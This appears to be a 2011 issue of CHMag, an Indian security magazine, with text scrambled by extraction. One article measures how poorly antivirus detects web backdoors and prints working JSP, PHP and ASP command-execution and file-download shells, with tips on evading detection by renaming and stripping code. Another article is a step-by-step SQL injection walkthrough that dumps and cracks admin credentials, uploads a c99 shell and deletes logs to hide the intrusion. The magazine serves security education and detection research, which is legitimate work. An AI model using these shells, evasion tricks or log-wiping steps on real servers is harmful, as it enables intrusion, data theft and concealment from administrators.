Issue 2 Mar 2010 | Page - 1

Issue 13 Feb 2011| Page - 2

Issue 13 Feb 2011 | Page - 3

Effectiveness of Antivirus in Detecting Web Application Backdoors

Abstract
This paper gives detailed idea of the effectiveness of Antivirus softwares in detecting various Web Application backdoors that widely affect Web Servers. The analysis would prove the inefficiency of current Antivirus techniques in detecting Web application backdoors and its consequences.

Introduction
considering the increased number of attacks on Web Applications and defacement statistics on Web Servers, its high time to review the security of Web Servers and protection mechanism aided to prevent them. Zone-H report at http://www.zone-h.org/news/id/4735 says that the defacements count gets
doubled every year. They also add that the methodologies used to gain access are still the same Application Layer

Vulnerabilities. Lets not go into application vulnerabilities but instead take a look at the very common web application Backdoors that are commonly used by hackers and how Antivirus being used widely on many Web Servers is incapable of detecting them.

Issue 13 Feb 2011| Page - 4

companies too. But thats not the case with web backdoors they dont have any self spreading mechanism and as they are only targeted on a particular server and thus the most common Backdoors signature remains unknown 2) The signatures are not built based on instructions like in PEs, but instead using strings and function calls. Simply renaming a function call, string or changing the order of the program can prove to be enough to bypass Signature Based Detection approach Note: Given below are some samples analyzed for example purpose. All the samples analyzed were downloaded form a collection of common web backdoors archive found on internet a few years back, Virus Total was used for this analysis. Test # 1.1 Objective: Test on an old and popular backdoor which proves that popularity matters for detection
Backdoor / File name: C99.php Description: A very old and widely used

Diagram - 001 Normally an attack goes like Diagram 001, where attacker finds vulnerability in a hosted web application and he manages to upload a malicious application backdoors in one of the servers supported languages, like ASP, PHP, ASP.NET, JSP etc. And this gives him control over the entire Web Server. Firewalls and Antivirus softwares are always part of a network. Firewalls are mostly not asked to monitor web traffic. So the only security measure the Web servers depend upon for this is the Antivirus. And we will go in detail analysis of common web application backdoors and how AVs lack in catching them.

Antivirus Detection Mechanisms and Where They Lack

Signature Based Detection
In this technique the Antivirus softwares need to have the signature of the Backdoor, and for that the companies should already have a copy of the backdoor for analysis. Reasons behind Signature Based Backdoors ineffectiveness of detection of Web

backdoor having. Great numbers of options. Born some 12 years ago, signatures are available with most of the Antivirus softwares.
Analysis: Shows that 81% AVs detect the

old man

File name: c99_locus7s.php Submission date: 2010-12-27 08:06:42 Result: 34 /42 (81.0%)

1) Signature based detection works fine with self propagating worms as there mass spreading mechanism will some way make it to the AV

Issue 13 Feb 2011 | Page - 5

Test # 1.2 Prove that Signature based detection is very easy to bypass when it comes to detect a web application backdoors as its based on strings.
Objective: Description:

Test # 3.1
Objective: Signature based detection of

Web Application backdoors are easy to bypass

Description: A test on another old and

Web backdoors built-in scripting languages are easy to bypass, the signatures are not build based on instructions like in PEs, but instead using strings and function calls. Simply renaming a function call or changing the order of the program would be enough to bypass the AV. A second test was done by simply removing the Change logs (Authors name and update logs) from the top of the script and the reanalysis showed that only 27 AV detected it now.

popular backdoor detected by all Avs. The aim is to try to make it undetectable by the AVs. An Active Server Pages simple command execute backdoor named cmdasp.asp was obtained from a very old archive http://michaeldaw.org/projects/webbackdoor-compilation Analysis: 81% of the AVs detected the script because of its popularity and availability of signature

File name: c99_locus7s.php Submission date: 2011-01-25 12:17:19 Result: 27 /43 (62.8%)

File name: cmdasp.asp Submission date: 2011-01-25 19:33:07 Result: 35/ 43 (81.4%)
Test #3.2

Test #2.1 Objective: Test on an old and not so popular backdoor to prove that its really hard for web application backdoors to reach AV vendor for signature building Description: Another pretty old sample was taken from the same web backdoor collection but with less functionality, although enough to deface a site
Analysis: Shows that only 2 AV detects the

Objective: Signature based detection on Web Application backdoors are easy to bypass Description: The above mentioned sample which contained some HTML CODE (just for formatting output) was edited in notepad and the HTML contents were stripped off leaving the actual backdoor code unhampered. Also functions were renamed and then backdoor was subjected to analysis //html striped cmdasp.asp
On Error Resume Next dim resp ' -- create the COM objects that we will be using -- ' Set woot = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Analysis: The analysis showed that striping resp = woot.Run ("cmd.exe /c " dir, of useless plain HTML form the ASP code 0, True) Response.Write Server.HTMLEncode(resp)

backdoor.

File name: AK-74 Security Team Web Shell Beta Version.php Submission date: 2011-01-25 17:33:25 Result: 2/ 43 (4.7%)

Issue 13 Feb 2011| Page - 6

Analysis:

The analysis showed that scripting of useless plain HTML form the ASP code and renaming the functions made it Undetectable by all the Avs while still providing full functionality

5) Dynamic analysis at runtime is not used on scripting languages as the codes are interpreted 6) Threat classification and Risk Analysis for Web Application is hard to automate For analyzing the above lets discuss a few common features of Web Application backdoors. As such a Web backdoor would have some or all of the following features 1) Execute System Commands On The Web Server 2) Traverse Directories And View/Edit Files And Programs 3) Upload Feature Helpful In Local Privilege Escalation 4) Download Documents And File 5) Registry Editing 6) Execute A Reverse Connect, Bind Shell 7) Database Management A Web backdoor with the first feature [Execute commands] will itself be capable enough to perform the rest of the features, in one way or other. So lets further discuss on that. Command execution is possible with almost all scripting languages, that is if certain default functions are not disabled on the environment depending upon the language. Also, and except [1], [6] and [7] are legitimate Web Application behaviors, so there is greater possibility of getting detected. Test # 4.1 Objective: Testing simple command execution Backdoor in JSP, PHP using default system command execution functions and analyzing the efficiency of Antivirus in static heuristic detection

File name: test2.asp Submission date: 2011-01-25 19:57:03 Result: 0/ 43 (0.0%)

Heuristics Based Detection

Not many Antivirus vendors depend upon heuristics for Web backdoor detection. Only a few prominent and leading Anti viruses employ this detection. Why heuristics based detection is not employed when it comes to Web Application? 1) Heuristics detection is based on dynamic analysis and is always considered risky as the chances of false positives are very high, and when it comes to Web Application, the risk is pretty high 2) Web Application undergoes updates and changes more frequently as compared to PE files, and the methodologies used for PE detection cannot be fully utilized here 3) Executables can be added with a legitimate sign in case of PEs but thats not possible with Web Scripts 4) Static analysis on PE, based on few critical and exceptional APIs cannot be used for static heuristic detection. But in Web Application, even one flagging on such a function call will make a legitimate code black listed

Issue 13 Feb 2011 | Page - 7

Command Execution shell in .jsp that can be compiled to .war java web archive format.

// cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>

Analysis: No Antivirus detected it

File name: cmd.jsp Submission date: 2011-01-25 21:32:32 (UTC) Result: 0/ 43 (0.0%)

Issue 13 Feb 2011| Page - 8

Test # 4.2 Objective: Command Execution shell in PHP which can be added to an already existing PHP file and can process request via User-Agent header <?php passthru(getenv("HTTP_ACCEPT_LANGU AGE")); echo '<br> Fb1h2s'; ?>
Analysis: No Antivirus detected it

Code: Download File from server

// Download_file.jsp by fb1h2s <%@ page import="java.util.*,java.io.*"%><% File f = new File (request.getParameter("d")); response.setContentType ("application/ear");response.setHeader ("Content-Disposition", "attachment; filename=\"fb1h2s.bak\""); InputStream in = new FileInputStream(f);ServletOutputStream outs = response.getOutputStream();int bit = 2555555;int i = 0;while ((bit) >= 0){bit = in.read();outs.write(bit);}outs.flush() ;outs.close();in.close();%>

File name: accept_lanaguage.php Submission date: 2011-01-25 21:36:20 (UTC) Result: 0/ 43 (0.0%)
The above analysis shows that even though the getRuntime().exec and passthu() functions were present in the code the static analysis of the AVs were not able to detect those critical function calls. Threat classification and Risk Analysis for Web Application is hard to automate. It becomes hard to detect which piece of code is legitimate and which one is not. Consider the following tests Test #4.3 Objective: Classifying a threat. Run time analysis is not possible on Web Backdoors Description: Given below is a simple program in JSP that can download files from the server. Downloading a file from web server is a legitimate activity and cannot be used as a reason for heuristic detection. But what if the program tries to download a configuration file or other critical files from the server. These kind of backdoors cannot be detected unless a runtime analysis is performed. And hence lack of detection is observed.

Analysis: No antivirus scanners detected it [Static and heuristics scan] due to inefficiency of detecting web backdoors at runtime. The above program is a threat, and these kinds of backdoors are hard to detect by automated AVs, unless there is a policy created for files and folders regarding accessibility

File name: download_jsp.war Submission date: 2011-01-26 3:36:20 Result: 0/ 43 (0.0%)

Conclusion
Web applications and environments hosting is growing rapidly and the necessity of providing improved security is increasing. The in efficiency of current Antivirus softwares in detecting Web Application backdoors is proved to be inadequate. These factors add up to the need of Antivirus vendors becoming apprised of Web Back door and improving specialized detection techniques. Also advises Web Server administrators need to be advised not to fully depend on native AV/Firewalls for preventing Web intrusions.

Issue 13 Feb 2011 | Page - 9

References and Appendix

Test # 1.1 http://www.virustotal.com/filescan/report.html?id=63d02e75b729e2cc1 7604235cf9c0b506b3ca5d578a8e32a0e85 e28763ca25a6-1293437202 Test #1.2 http://www.virustotal.com/filescan/report.html?id=07623faf67eae7706 dbe43bf45f383a1c19b6ab81dbc941ea7e47 030412c7166-1295957839 Test #2.1 http://www.virustotal.com/filescan/report.html?id=dc91561fd0b7a555e 9e1a26fdd189d18832b9d896f50e7f8afa15 3773d1a851c-1295976805 Test #3.1 http://www.virustotal.com/filescan/report.html?id=101bf8dcdd414f09b a46cdecbd96e8606c79b0e76b6a2ce0403 95e775cb4da86-1294670298

cc7eadad05233a51fedb146c316017c31bf18 56fd8f2a5-1295949577 Test #4.3 http://www.virustotal.com/filescan/report.html?id=092e2e97b33119a97 441c24194c49bf75d3cec7371c42fb1f94e2e caeb78d8c9-1295936735

FB1H2S aka Rahul Sasi

http://fb1h2s.com http://garage4hackers.com Rahul Sasi is a person highly passionate about Ethical hacking, and is working as a Info Security Consultant.

Test #3.2 http://www.virustotal.com/filescan/report.html?id=1b686ac4c7ffca2e54 6e3c82d0b9012109f74d72f957615395b04 3923b83054e-1295374370 Test # 4.1 http://www.virustotal.com/filescan/report.html?id=6c4ccd3589f1d6484 3e884382b448f03d1277317524fa45e06d5 19b4b9ed5dc0-1295991152 Test #4.2 http://www.virustotal.com/filescan/report.html?id=f1460fb9e543fb5d1c

Issue 13 Feb 2011| Page - 10

Mantra Free and Open Source Security Framework

What is Mantra?
Mantra is a collection of hacking tools, addons, and scripts based on Firefox. Right from the beginning, one Firefox and Google Chrome of the attractive features which made both of them outstanding was their expandability by means of installing useful extensions or add-ons. Programmers and developers started coding add-ons which helped to make the online web more easy and functional. Naturally, there were add-ons developed for hackers too. Some went out dated, some were very powerful, and some

went unnoticed despite their powerful capabilities. We tried to get all the add-ons of this type available out there on the internet, installed, analyzed, ranked and after that included them on our own security toolkit. By looking at the total number of exploit getting added to the exploit db, we think that an exploit development framework based on the browser can get very good acceptance from the security and hacking communities and this triggered the making of Mantra. As of now Mantra is just a security toolkit rather than a full-fledged framework. We think its always better to give a choice to the end user rather than providing what we think is the best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for framework the and will work on their behalf.

Some of the features of Mantra

1. Its built on top of the browser - Saves lots of man power and learning curve.

Issue 13 Feb 2011 | Page - 11

2. It is Cross platform and flexible - It can easily run on Windows, Mac and Linux natively 3. Its free as "free beer and "free speech" 4. Its open source, so you are free to use it or modify it your own way.

project. We are looking out for bringing attention of the security researchers to the possibility of such a platform. If many people are use it, definitely the community will grow and we will be able to see more powerful functional and targeted tools in the near future.

What is the use?

According to the present age standards, Mantra can be helpful to perform all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.

How you can contribute?

Since its an open source project, you are encouraged to become a part of it. We need developers for writing codes, modifying extension framework, theme designers for artworks and documentation writers to help better promote the project.

What Mantra is NOT?

1. Its Not a one click automatic Pwnage tool (please don't think that its a stick in a magicians hand. May be it be possible for us to make it a one click pwnage tool at least for some common types of attacks in the future. But not now) 2.Its not mature enough to serve everything for a user to perform any sort of attack 3.It cant be used as a replacement for your normal browser. Its not fast enough, does not have plenty of space to play with etc. 4. You can find that there is more than one tool present in the toolkit for performing same sort of attacks but at the same time it lacks some simple tools here and there.

Close Look
Beta version of Mantra Security Toolkit can be downloaded from http://getmantra.com/download/. As of now its available for both Linux and Windows platforms. It comes as a self extracting archive and needs almost zero setup. The graphical user interface provided by Mantra security toolkit is straight forward and easy to use. The navigation bar is placed on top of the toolkit and it integrates the search bar into it. Search engines can be switched easily by using keywords or by clicking on their respective icons. As of now it supports searching on XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Extploit-DB, Scroogle, RFC, OVAL etc apart from normal search engines. It also supports autocomplete and real-time search suggestions.

Who needs it?

Nice question. If you are into auditing, vulnerability assessment, penetration testing or information security training etc., you are going to be benefited from this

Issue 13 Feb 2011| Page - 12

Step 1: I'm on the home page of the website now.

[code]http://192.168.132.128/[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar1.jpg[/img] Step 2: As of now Mantra does not have any crawling mechanism to find vulnerable URLs on the website (read it as a limitation). So we have to do that manually. I went through all the pages of web site and found a page with URL input
[code]http://192.168.132.128/?id=13[/code]

The sidebar is located on the right side of the toolkit which gives one click access to all the tools available on the toolkit. Tools can be fine tuned according to the user's needs from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/ The status bar on the bottom gives various information about the current webpage including remote IP, location details, technologies used etc. More details about particular information can be obtained by simply clicking on the respective notifications on the status bar. There are also a proxy button, to switch between proxies, Passive Reconnaissance button, to conduct packet less discovery of target resources, quick profile switcher to play with cookies etc.

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar2.jpg[/img] Step 3: I launched Hackbar by pressing F9. Hackbar is a tool for doing basic audits on web pages. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar3.jpg[/img]

Step 4: The power of single quote. I'm checking the web site is actually sanitizing the input or not by putting a ' at the end of the URL and pressing on the Execute button.
[code]http://192.168.132.128/?id=13'[/code]

A quick demo
In this particulate demo we will try to root a remote web server using Mantra security toolkit. Due to space limitation, I have not included the screen shots. To view them please follow the image links mentioned under every step.

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar4.jpg[/img]

Issue 13 Feb 2011 | Page - 13

Since the page content is different from the previous one. I can make sure that the web page is not sanitizing the input from the URL. Step 5: Lets find out the number of tables in the current database.
[code]http://192.168.132.128/?id=13 order by 1[/code]

[code]http://192.168.132.128/?id=13 order by 8[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar13.jpg[/img] Step 9: Now lets go ahead and make a UNION statement. I can make it easily by going to SQL > UNION SELECT STATEMENT [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar14.jpg[/img] Step 10: I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar16.jpg[/img] Step 11: Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar6.jpg[/img] Step 6: I have to keep on increasing the last number till I see any changes in the page. In usual practice its going to be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
[code]http://192.168.132.128/?id=13 order by 7[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar7.jpg[/img] Step 7: I went up to 7 and no change till now.

[code]http://192.168.132.128/?id=13 order by 7[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar19.jpg[/img] Step 12: I replaced number 2 in URL with another SQL command, it got executed and the result is displayed on the page.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar12.jpg[/img] Step 8: I'm on 8 now and now I can see the page changed.

Issue 13 Feb 2011| Page - 14

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar21.jpg[/img] The current user is cms_user@localhost. Step 13: Lets find out the version of the database. I replaced 2 in the URL with version() command.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]

Step 16: I want to filter out columns from the table "user".
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar25.jpg[/img] Step 17: Lets find the user name. [code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code] [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar27.jpg[/img] Step 18: And password, of course.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar22.jpg[/img] 5.0.45 is the version Step 14: Let me list all the tables.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar23.jpg[/img] From this list I found "user" as an interesting table. Step 15: Now I listed all the columns and its a big list.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar26.jpg[/img] Its encrypted. Step 19: Decrypting the password. I'm making a guess here that the password is encrypted using MD5 by looking at the length and other parameters of the data. I copied the MD5 hash, pasted it into the hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar24.jpg[/img]

Issue 13 Feb 2011 | Page - 15

[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar30.jpg[/img] Step 20: Voila.!!! I got the password! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar31.jpg[/img] Step 21: Finding the log in page. Its was right in front of me [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar32.jpg[/img] Step 22: Logging in with the credentials I have [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar33.jpg[/img] Step 23: Greetings.!!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar35.jpg[/img] Step 24: I'm an admin now. Look at my powers. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar36.jpg[/img]

Step 25: Let me add an event. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar37.jpg[/img] Step 26: And of course I want to upload a picture. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar38.jpg[/img] Step 27: Let me test the filtering mechanism of the website again. I'm trying to upload a PHP shell using the facility of website to upload custom picture. Lets see whether its possible or not. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar39.jpg[/img] Step 28: Now I'm pressing on "Add Event" button. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar40.jpg[/img] Step 29: Nice. Looks like it's got uploaded. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar41.jpg[/img]

Issue 13 Feb 2011| Page - 16

Step 30: Let's see where the shell got uploaded to. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar42.jpg[/img] Step 31: I'm trying to get the default upload location. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar43.jpg[/img] [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar44.jpg[/img] Step 32: Looks like I got it. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar45.jpg[/img] Let me click on the c9shell.php file I just uploaded. Step 33: Voila. I have shell access!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar46.jpg[/img] Step 34: I simply clicked on the up button to get the root folder. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar48.jpg[/img]

Now I can do whatever I wish. Deface the website, maintaining access or whatever. Step 35: What I'm interested is the log folder. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar49.jpg[/img] Step 36: I clicked on the log.log file and it has the logs of my noisy SQL injection attacks. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar51.jpg[/img] Step 37: Let me go back and edit the log file. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar52.jpg[/img] [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar53.jpg[/img] Step 38: I deleted the complete log entries. Now saving it. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar54.jpg[/img] Step 39: Nice. Log file is empty now. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar56.jpg[/img]

Issue 13 Feb 2011 | Page - 17

Step 40: Now, lets remove the c99 shell by pressing on Self Remove. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar57.jpg[/img] Step 41: Confirmed!!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar58.jpg[/img] Step 42: OK. Good Bye C99!!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar59.jpg[/img] Step 43: Well. It got deleted itself. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar60.jpg[/img] Happy Hacking.!!! :-) If you have any suggestion or query please mail us at contact@getmantra.com Or you can also contact us at: getmantra.com/forums twitter.com/getmantra facebook.com/pages/Mantra/17078748962 7527

Abhi M Balakrishnan
Abhi M Balakrishnan is an Electronics hobbyist turned Hacktivist, Working as Information Security Consultant to put food on his table and roof over his head and has Performed several security consulting assignments in the area of penetration testing, code reviews, web application assessments, security architecture reviews etc.

Yashartha Chaturvedi
Yashartha Chaturvedi is an Independent cyber security consultant, believes in ethical hacking, provides innovative solutions and knowledge based training to secure computer/mobile from cyber criminals, having an aim to educate the common internet user against the most dangerous security loopholes,vulnerabilities and attacks by publishing regular updates/patches.

Issue 13 Feb 2011| Page - 18

Application Security Basics

The

The Institute for Security and Open Methodologies (ISECOM) defines security as "a form of protection where a separation is created between the assets and the threat". Security in general has many categories, it can be the security of physical assets like Home, Airport, Infrastructure, or some kind of political security like Human security, national security or computer security which itself has many categories. Despite of so many categories for security, two entities are always involved i.e. Asset and Threat. In all scenarios the asset has to be protected from the threat. Considering our home security, we all lock our doors before going out. Here home is the asset and threat is the thieves. If the thief is intelligent enough he will gather all our information like at what time the home is usually vacant, how many people live there, or what kind of lock you have applied. This all information will help him to breach your home security. Similarly in the IT security world, asset may be the data flowing through Network, data stored on a Server, or a Database and threats are the hackers. Same as thieves the hackers first step is Information Gathering.

With Reference to information security we can divide security into categories like Application Security, data security, Network Security and others. In this article we will focus more on the Basics of Application Security. Wiki says Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgra de, or maintenance of the application. In simple words it comprises the security issues involved in any type of application, including but not limited to java, PHP, C++, and python.

Issue 13 Feb 2011 | Page - 19

Application Security Trends

The world of internet is growing in tremendous way with IPv4 addresses getting depleted. With growth in number of users, sophistication in technology, the attack vectors have also increased. The graph below shows the study by SANS institute, depicting the growth in the number of attack vectors in first half of year 2010.

So, it can be said that the two sides of the application security, both good and bad, are in a constant state of evolution.

The malicious guy comes in: THE HACKER

There might be some guys with the malicious intent, who might be looking to compromise your assets. They might be technology geeks, freaks and motivated hackers, attacking your applications just for fun, or for profit. Many times, they are also funded by high profile companies or even governments to target the sensitive data and assets of companies or countries they are in competition. Well known Stuxnet worm and the Aurora attacks are just a few examples; of this; however, there might be many attacks that go unnoticed by the governments and the organizations.

Thus, with the increasing sophistication and numbers, of attacks and defense techniques, it has become a cat and mouse game. The attacks earlier focused on the Operating Systems themselves. However, with a continuous effort and improvement on the Operating Systems, the vulnerabilities are difficult to find in them, hence resulting in the shift of the fulcrum from the Operating System to the targeted applications. The graph below shows the trend for four popular applications, i.e. Adobe reader, Ms Word, Ms Excel and Ms Power point. If you look at the Adobe, you will see that the vulnerabilities increased drastically for year 2010.

Issue 13 Feb 2011| Page - 20

These attackers try to gather as much information as possible for the target. This will involve a lot of searching on the search engines, news groups, job sites, your own site, public forums, social networks like facebook, myspace, orkut etc. A lot of information can be harvested in this manner which can be later misused to breach security. This information includes email ids, date of birth, likings and disliking, girl friends and boyfriends, the software used in the company, location and much more. A popular quote in the hacking world says Deterministic hackers spend 90% of their time in information gathering phase, rest 10% is spent on the breach.

Deeply understanding the threats: Ohh they are so many

The attack techniques have evolved over time, and there are many ways in which the applications can be compromised. The attacks can be following but not limited to: Cross site scripting SQL injection Buffer overflows Cross site request forgery XPATH injection Format string attacks Heap overflows Redirection attacks Authentication attacks Authorization attacks Canonicalization attacks OS commanding SSI includes Parameter pollution Session based attacks Sniffing Spoofing Phishing

Knowing the threats: Build your walls strong enough

The assets need to be secured from the threats. However, for securing the assets, there needs to be a proper knowledge on the boundaries of the application from which input comes. In other simple words, the first rule of security is the user input MUST not be trusted. So, for securing the application, the application castle should be strong enough to stop the malicious input on the walls itself. This approach is called as input validation. The other approach is that even if the enemy enters the castle, dont let them go away, or cripple them. This approach is termed as output validation. These threats can come from any input, which may include a form field, url, cookies, post parameters etc. These inputs should not be trusted in any manner, as this trust is what leads to the compromise.

These are only a few examples. Many more exist and the list keeps on getting updated on a regular basis. A simple Google search on Cross site scripting or any of these will

Issue 13 Feb 2011 | Page - 21

give you thousands of results, which are enough to explain the vulnerability. There are many security projects(OWASP) and institutes(SANS) working to create freelyavailable articles, methodologies, documentation, tools, and technologies to provide unbiased, practical, cost-effective information about application. These communities also release a list of the top vulnerabilities at regular interval of time.

and educate themselves so as to involve a secure methodology in the lifecycle of the development. These vulnerabilities are large in number, and hence require a thorough study.

Save

Me

Please Ankur Bhargava

Working as a security researcher in Infosys Technologies, his daily job includes malware analysis, detection and prevention, network and application penetration testing and secure code review.

For each of the vulnerabilities, there exist different ways to mitigate them. However, speaking in a generic manner, all the vulnerabilities can be prevented by proper validations, both on input and output. If only one of these is done, this vulnerability can surely be exploited by an attacker. So, it is always better to have a two way defense mechanism, which acts as a double shield to prevent the attacks against the application. When the development of a application is done, an approach that ensure both these validations at the same time should be followed. This is the best possible solution to mitigate the attacks. As far as targeted application like Acrobat Reader or Microsoft applications are concerned the only way to save yourself, is to have updates which are, released by the vendors. Even if you miss a single update your machine is vulnerable to any type of attack. Presently there are many tools to prevent applications from getting hacked but at the end its in the hands of the application developer to make his application secure enough and not only checks if all the doors are locked but ensure that every other entry point is also locked and secured.

Saurabh Sharma
He is working in Infosys Technologies Limited. His primary responsibility is to provide Enterprise Security Solutions to our clients. He has a good understanding on Application Security dealing with Threat Modeling, Secure code analysis and Penetration testing.

Conclusion
Thus, we can conclude that the threats on the applications are on a continuous rise, and developers need to be aware of these

Issue 13 Feb 2011| Page - 22

CHMag: 06.02.2010 to 06.02.2011

Issue 13 Feb 2011 | Page - 23

It is a matter of rejoice for us to see CHMag entering in to its second year of publication. Considering the overwhelming response of the people, we feel that we are on the right track towards our objective. When we look in to past, a wave of exhilaration passes through us and we also wonder how we could do it. We had heard that an idea could change the lives or a lot of things could take over a cup of coffee, but never experienced it. We experienced it only when we freezed on the idea of starting a

Idea was freezed, but next challenge was how to go ahead with it. But our enthusiasm was so great that we decided our strategy, divided the job in to tasks, everybody worked very hard with amazing dedication and at last our efforts bore a sweet fruit. It was an amazing journey from seemingly impossible to just possible. And so after a lot of thinking and planning we came out with the 1st issue on 6th Feb, 2010 at nullcon, an International Hacking and Security Conference. And so CHMag First Indian Hacking Magazine was born.

magazine over a cup of coffee. After we finished ClubHack 2009 conference, a question was tossed up in our casual meetings that what next after ClubHACK conference? It led to a brainstorming session wherein an idea was conceived that why not to start a magazine on security and hacking to make the people aware about hacking as well as to provide a creditable platform for the security professionals, experts and engineers to share their ideas and knowledge. Till that time, in India, there was no such magazine dedicated solely to the security and hacking. Consensus was reached over the idea and it gave birth to CHMag.

